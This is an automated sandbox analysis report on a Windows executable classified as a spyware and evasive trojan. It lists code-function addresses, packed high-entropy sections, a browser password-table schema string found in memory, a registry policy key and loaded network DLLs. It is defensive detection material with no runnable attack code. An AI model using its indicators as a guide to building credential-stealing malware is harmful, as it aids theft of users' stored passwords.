Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3A64B	0_2_00F3A64B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F82640	0_2_00F82640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6C636	0_2_00F6C636
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFC63A	0_2_00FFC63A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010067CA	0_2_010067CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE662C	0_2_00FE662C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7C622	0_2_00F7C622
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA8618	0_2_00FA8618
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010207F3	0_2_010207F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4660D	0_2_00F4660D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAA7FE	0_2_00FAA7FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F767F1	0_2_00F767F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4E7F8	0_2_00F4E7F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F987F5	0_2_00F987F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA87ED	0_2_00FA87ED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9E7DB	0_2_00F9E7DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01030621	0_2_01030621
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8C7CB	0_2_00F8C7CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7E7C9	0_2_00F7E7C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F887C7	0_2_00F887C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED67A5	0_2_00ED67A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDA7B6	0_2_00FDA7B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC67B0	0_2_00FC67B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01024654	0_2_01024654
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE479F	0_2_00FE479F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01018666	0_2_01018666
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F78774	0_2_00F78774
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD676C	0_2_00FD676C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01052699	0_2_01052699
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF2761	0_2_00FF2761
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE075C	0_2_00FE075C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010406AF	0_2_010406AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB8755	0_2_00FB8755
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F94742	0_2_00F94742
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F58730	0_2_00F58730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010886DA	0_2_010886DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED8731	0_2_00ED8731
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010266E1	0_2_010266E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010026EE	0_2_010026EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEE706	0_2_00FEE706
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE0717	0_2_00EE0717
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F828F2	0_2_00F828F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB68F1	0_2_00FB68F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3C8FF	0_2_00F3C8FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF68EF	0_2_00FF68EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6E8E2	0_2_00F6E8E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC88E8	0_2_00FC88E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDC8E8	0_2_00FDC8E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F868D4	0_2_00F868D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104A937	0_2_0104A937
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB48C1	0_2_00FB48C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101C94B	0_2_0101C94B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F748B8	0_2_00F748B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01042957	0_2_01042957
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101E955	0_2_0101E955
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100A965	0_2_0100A965
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01028968	0_2_01028968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103E96C	0_2_0103E96C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F42885	0_2_00F42885
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F36881	0_2_00F36881
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2888A	0_2_00F2888A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4488D	0_2_00F4488D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4A87B	0_2_00F4A87B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F20862	0_2_00F20862
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F34864	0_2_00F34864
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F80860	0_2_00F80860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD0867	0_2_00FD0867
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F92867	0_2_00F92867
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA685C	0_2_00FA685C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5C83E	0_2_00F5C83E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F50824	0_2_00F50824
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F24810	0_2_00F24810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBA80B	0_2_00FBA80B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF89FC	0_2_00FF89FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2E9D1	0_2_00F2E9D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01054822	0_2_01054822
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FCE9D4	0_2_00FCE9D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F629BE	0_2_00F629BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102284A	0_2_0102284A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDE9B2	0_2_00FDE9B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F909A1	0_2_00F909A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F929A6	0_2_00F929A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB099F	0_2_00FB099F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC8990	0_2_00EC8990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2698F	0_2_00F2698F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F68988	0_2_00F68988
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F96979	0_2_00F96979
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA2974	0_2_00FA2974
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE297F	0_2_00EE297F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C897	0_2_0102C897
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9E964	0_2_00F9E964
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA495B	0_2_00FA495B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAE95F	0_2_00FAE95F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010488A1	0_2_010488A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF494C	0_2_00FF494C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD293D	0_2_00FD293D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010148D3	0_2_010148D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103A8DA	0_2_0103A8DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBC91A	0_2_00FBC91A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD8918	0_2_00FD8918
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2A91F	0_2_00F2A91F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F84905	0_2_00F84905
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFCAC0	0_2_00EFCAC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01050B32	0_2_01050B32
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA0AC1	0_2_00FA0AC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFEABB	0_2_00FFEABB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEAA91	0_2_00FEAA91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFAA8F	0_2_00FFAA8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFCA8F	0_2_00FFCA8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0107CB85	0_2_0107CB85
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF0A6A	0_2_00FF0A6A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01026B94	0_2_01026B94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01018BA0	0_2_01018BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F66A55	0_2_00F66A55
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01024BAE	0_2_01024BAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED4A40	0_2_00ED4A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7CA41	0_2_00F7CA41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F58A42	0_2_00F58A42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ECCA54	0_2_00ECCA54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC8A45	0_2_00FC8A45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F86A43	0_2_00F86A43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01028BC8	0_2_01028BC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104EBCB	0_2_0104EBCB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F74A22	0_2_00F74A22
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01012BDD	0_2_01012BDD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE8A1E	0_2_00FE8A1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F76A1D	0_2_00F76A1D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9CA13	0_2_00F9CA13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01006BF0	0_2_01006BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01086BF6	0_2_01086BF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9AA07	0_2_00F9AA07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F42BF5	0_2_00F42BF5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6CBE6	0_2_00F6CBE6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F24BE0	0_2_00F24BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01038A1E	0_2_01038A1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F80BDD	0_2_00F80BDD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5EBDF	0_2_00F5EBDF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7EBCF	0_2_00F7EBCF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7ABCB	0_2_00F7ABCB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01036A4B	0_2_01036A4B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC4BA0	0_2_00EC4BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01018A4F	0_2_01018A4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC6B9C	0_2_00FC6B9C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102EA65	0_2_0102EA65
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01046A7A	0_2_01046A7A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F46B7F	0_2_00F46B7F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDCB5A	0_2_00EDCB5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC0B41	0_2_00FC0B41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FCAB41	0_2_00FCAB41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F54B25	0_2_00F54B25
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F64B25	0_2_00F64B25
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100EAD4	0_2_0100EAD4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F18B18	0_2_00F18B18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE0B15	0_2_00FE0B15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD6B11	0_2_00FD6B11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103CAF7	0_2_0103CAF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F40B0C	0_2_00F40B0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBECFE	0_2_00FBECFE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F82CFF	0_2_00F82CFF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB0CF6	0_2_00FB0CF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFCCE0	0_2_00EFCCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE2CF8	0_2_00EE2CF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9ECEF	0_2_00F9ECEF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA6CE0	0_2_00FA6CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101ED1B	0_2_0101ED1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FACCDC	0_2_00FACCDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F62CD8	0_2_00F62CD8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F48CC0	0_2_00F48CC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103ED43	0_2_0103ED43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FCACBF	0_2_00FCACBF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01042D49	0_2_01042D49
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101CD66	0_2_0101CD66
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC2C90	0_2_00FC2C90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F20C83	0_2_00F20C83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F84C8C	0_2_00F84C8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE0C8B	0_2_00FE0C8B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100AD75	0_2_0100AD75
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103CD79	0_2_0103CD79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4EC75	0_2_00F4EC75
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2AC70	0_2_00F2AC70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2CC78	0_2_00F2CC78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01036D8C	0_2_01036D8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB8C6A	0_2_00FB8C6A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F36C66	0_2_00F36C66
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01038DA2	0_2_01038DA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF4C4D	0_2_00EF4C4D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFCC53	0_2_00FFCC53
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01034DAF	0_2_01034DAF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB6C4E	0_2_00FB6C4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF2C46	0_2_00FF2C46
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F44C36	0_2_00F44C36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F50C33	0_2_00F50C33
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBAC30	0_2_00FBAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F38C23	0_2_00F38C23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01030DDE	0_2_01030DDE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F30C14	0_2_00F30C14
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F56C1E	0_2_00F56C1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED8C1E	0_2_00ED8C1E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6EC03	0_2_00F6EC03
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F94C0C	0_2_00F94C0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDEDF5	0_2_00FDEDF5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9CDD7	0_2_00F9CDD7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB4DCB	0_2_00FB4DCB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE6DCA	0_2_00FE6DCA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF4DC5	0_2_00FF4DC5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F60DB4	0_2_00F60DB4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01016C42	0_2_01016C42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF8DA4	0_2_00FF8DA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE4DA0	0_2_00FE4DA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4CD96	0_2_00F4CD96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F26D9B	0_2_00F26D9B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD8D83	0_2_00FD8D83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFCD60	0_2_00EFCD60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE4D70	0_2_00EE4D70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6ED4C	0_2_00F6ED4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9AD3D	0_2_00F9AD3D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA8D2D	0_2_00FA8D2D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101ACE1	0_2_0101ACE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA0D19	0_2_00FA0D19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105ACE3	0_2_0105ACE3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE2D16	0_2_00FE2D16
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01022CF7	0_2_01022CF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F98D05	0_2_00F98D05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01032CFE	0_2_01032CFE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0107EF02	0_2_0107EF02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE8EF8	0_2_00FE8EF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F74EFD	0_2_00F74EFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F90EC1	0_2_00F90EC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDAEC7	0_2_00FDAEC7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC2EA0	0_2_00EC2EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE6EBE	0_2_00EE6EBE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF2EAE	0_2_00FF2EAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F96EAE	0_2_00F96EAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F80EA5	0_2_00F80EA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFEE91	0_2_00FFEE91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F88E8C	0_2_00F88E8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED6E97	0_2_00ED6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8AE5A	0_2_00F8AE5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F86E56	0_2_00F86E56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01056FAB	0_2_01056FAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F82E4A	0_2_00F82E4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01010FB4	0_2_01010FB4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FCCE44	0_2_00FCCE44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8CE44	0_2_00F8CE44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD6E3A	0_2_00FD6E3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3CE2F	0_2_00F3CE2F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC0E20	0_2_00FC0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01044FDB	0_2_01044FDB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F72E1D	0_2_00F72E1D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDAE00	0_2_00EDAE00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFCE00	0_2_00EFCE00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0107AFF1	0_2_0107AFF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD4FF2	0_2_00FD4FF2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0108AE12	0_2_0108AE12
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFCFE5	0_2_00FFCFE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC6FE2	0_2_00FC6FE2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101AE2E	0_2_0101AE2E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F98FCD	0_2_00F98FCD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED8FAD	0_2_00ED8FAD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FCEFA8	0_2_00FCEFA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFAF82	0_2_00FFAF82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F76F74	0_2_00F76F74
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2EF60	0_2_00F2EF60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC4F68	0_2_00FC4F68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB2F6D	0_2_00FB2F6D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01050EA2	0_2_01050EA2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F22F58	0_2_00F22F58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE8F5D	0_2_00EE8F5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF6F4A	0_2_00FF6F4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE6F47	0_2_00FE6F47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F40F4B	0_2_00F40F4B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6AF31	0_2_00F6AF31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102CEDA	0_2_0102CEDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF0F23	0_2_00FF0F23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDEF30	0_2_00EDEF30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBCF24	0_2_00FBCF24
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED4F08	0_2_00ED4F08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102EEE4	0_2_0102EEE4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103CEE4	0_2_0103CEE4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3AF1C	0_2_00F3AF1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7CF00	0_2_00F7CF00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F450F3	0_2_00F450F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4D0F3	0_2_00F4D0F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F690E3	0_2_00F690E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9F0E1	0_2_00F9F0E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104311D	0_2_0104311D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01017120	0_2_01017120

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00ED4A30 appears 76 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00EC8000 appears 55 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9976143490484429
Source: file.exe	Static PE information: Section: sbjgrbkb ZLIB complexity 0.9943977255293035

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EF0A6C CoCreateInstance,

0_2_00EF0A6C

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2089885790.0000000005F14000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2112540769.0000000005F16000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090160390.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

Virustotal: Detection: 50%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
